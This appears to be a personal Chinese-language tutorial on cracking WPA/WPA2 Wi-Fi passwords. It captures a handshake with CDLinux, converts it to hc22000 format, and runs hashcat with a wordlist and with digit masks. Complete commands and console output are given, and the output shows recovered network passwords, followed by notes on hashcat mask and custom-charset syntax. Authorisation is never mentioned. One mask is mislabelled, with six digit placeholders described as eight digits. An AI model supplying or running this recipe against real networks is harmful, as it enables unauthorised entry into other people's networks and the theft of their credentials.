破解wifi

1.用CDLINUX抓包:*.cap

2轉包文件:將cap文件轉換並下載989_1637563967.hc22000

3.下載hashcat:https://hashcat.net/

4.命令：hashcat -m 22000 989_1637563967.hc22000 wang.txt

hashcat -m 22001 989_1637563967.hc22000 wang.txt

-m 22000 (22001)破解無線wifiwpa /wpa2

989_1637563967.hc22000抓包文件轉換后的文件

wang.txt為密碼字典

命令行結果：

hashcat (v6.2.5) starting

ADL2_New_QueryPMLogData_Get is missing from ADL shared library.

OpenCL API (OpenCL 2.1 AMD-APP (2580.6)) - Platform #1 [Advanced Micro Devices, Inc.]
=====================================================================================
* Device #1: AMD Radeon R5 M330, 1920/2048 MB (1523 MB allocatable), 5MCU
* Device #2: , skipped

OpenCL API (OpenCL 2.1 ) - Platform #2 [Intel(R) Corporation]
=============================================================
* Device #3: Intel(R) HD Graphics 520, 1568/3222 MB (1023 MB allocatable), 24MCU
* Device #4: Intel(R) Core(TM) i5-6200U CPU @ 2.30GHz, skipped

Minimum password length supported by kernel: 8
Maximum password length supported by kernel: 63

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Optimizers applied:
* Zero-Byte
* Single-Hash
* Single-Salt
* Slow-Hash-SIMD-LOOP

Watchdog: Hardware monitoring interface not found on your system.
Watchdog: Temperature abort trigger disabled.

Host memory required for this attack: 847 MB

Dictionary cache hit:
* Filename..: wang.txt
* Passwords.: 26663
* Bytes.....: 266630
* Keyspace..: 26663

The wordlist or mask that you are using is too small.
This means that hashcat cannot use the full parallel power of your device(s).
Unless you supply more work, your cracking speed will drop.
For tips on supplying more work, see: https://hashcat.net/faq/morework

Approaching final keyspace - workload adjusted.

9e989c00edf52a6044042f296105049f:e8cc184afd30:d46075a8c704:wang:19641317（找到的密碼）

Session..........: hashcat

Status...........: Cracked
Hash.Mode........: 22000 (WPA-PBKDF2-PMKID+EAPOL)
Hash.Target......: 989_1637563967.hc22000
Time.Started.....: Mon Nov 22 14:52:29 2021 (1 sec)
Time.Estimated...: Mon Nov 22 14:52:30 2021 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (wang.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 3036 H/s (0.36ms) @ Accel:64 Loops:16 Thr:128 Vec:1
Speed.#3.........: 2499 H/s (1.87ms) @ Accel:8 Loops:16 Thr:64 Vec:1
Speed.#*.........: 5535 H/s
Recovered........: 1/1 (100.00%) Digests
Progress.........: 4096/26663 (15.36%)
Rejected.........: 0/4096 (0.00%)
Restore.Point....: 1536/26663 (5.76%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Restore.Sub.#3...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: 19630902 -> 19650602
Candidates.#3....: 19590619 -> 19630901

Started: Mon Nov 22 14:52:23 2021
Stopped: Mon Nov 22 14:52:32 2021

5.不用密碼字典：

E:\wifi\hashcat-6.2.5\hashcat-6.2.5>

第一步：hashcat -a 3 -m 22000 989_1637563967.hc22000 ?d?d?d?d?d?d

hashcat (v6.2.5) starting

ADL2_New_QueryPMLogData_Get is missing from ADL shared library.

OpenCL API (OpenCL 2.1 AMD-APP (2580.6)) - Platform #1 [Advanced Micro Devices, Inc.]
=====================================================================================
* Device #1: AMD Radeon R5 M330, 1920/2048 MB (1523 MB allocatable), 5MCU
* Device #2: , skipped

OpenCL API (OpenCL 2.1 ) - Platform #2 [Intel(R) Corporation]
=============================================================
* Device #3: Intel(R) HD Graphics 520, 1568/3222 MB (1023 MB allocatable), 24MCU
* Device #4: Intel(R) Core(TM) i5-6200U CPU @ 2.30GHz, skipped

Minimum password length supported by kernel: 8
Maximum password length supported by kernel: 63

INFO: All hashes found in potfile! Use --show to display them.（表示找到密碼但不顯示）

如果顯示（Skipping mask '?d?d?d?d?d?d' because it is smaller than the minimum password length.則表示沒有找到密碼）

Started: Mon Nov 22 15:15:29 2021
Stopped: Mon Nov 22 15:15:33 2021

第二步：hashcat -a 3 -m 22000 989_1637563967.hc22000 ?d?d?d?d?d?d --show顯示結果

 ?d?d?d?d?d?d：8位數字

9e989c00edf52a6044042f296105049f:e8cc184afd30:d46075a8c704:wang:19641512

hashcat -a 3 -m 22000 1152_1637565237.hc22000 ?d?d?d?d?d?d?d?d?d?d?d（11位數字）

2. 暴力破解掩碼模式

Brute-force 掩碼暴力破解模式：

   ?l = abcdefghijklmnopqrstuvwxyz
   ?u = ABCDEFGHIJKLMNOPQRSTUVWXYZ
   ?d = 0123456789
   ?s =  !"#$%&'()*+,-./:;<=>?@[\]^_`{|}~
   ?a = ?l?u?d?s

 

比如 ?d?d?d?d?d?d?d?d 對應8位純數字組合； ?l?l?l?l?d?d?d?d 對應前4位小寫字母，后4位數字組合。。。

但如果我們不確定某一位到底是數字還是字母怎么寫組合呢？這時候就要用到高級組合：

-1,  --custom-charset1=CS  
-2,  --custom-charset2=CS  
-3,  --custom-charset3=CS    
-4,  --custom-charset4=CS  

比如設置 --custom-charset1=?l?d 那么就表示 ?1代表小寫字母與數字組合，那么8位隨機的數字與小寫字母組合可以寫成 ?1?1?1?1?1?1?1?1，完整的例子：
hashcat test.txt -a 3 -m 0 --custom-charset1=?l?d ?1?1?1?1?1?1?1?1
再比如設置 --custom-charset2=xiao106347 那么就表示 ?2 代表字符串由 x i a o 1 0 6 3 4 7 組成的所有可能組合，完整例子：
hashcat test.txt -a 3 -m 0 --custom-charset2=xiao106347 ?2?2?2?2?2?2?2?2
hashcat -a 3 -m 22000 4159_1637588054.hc22000  ?h?h?h?h?h?h?h?h  -o  0cb7.txt(結果保存在0cb7.txt中）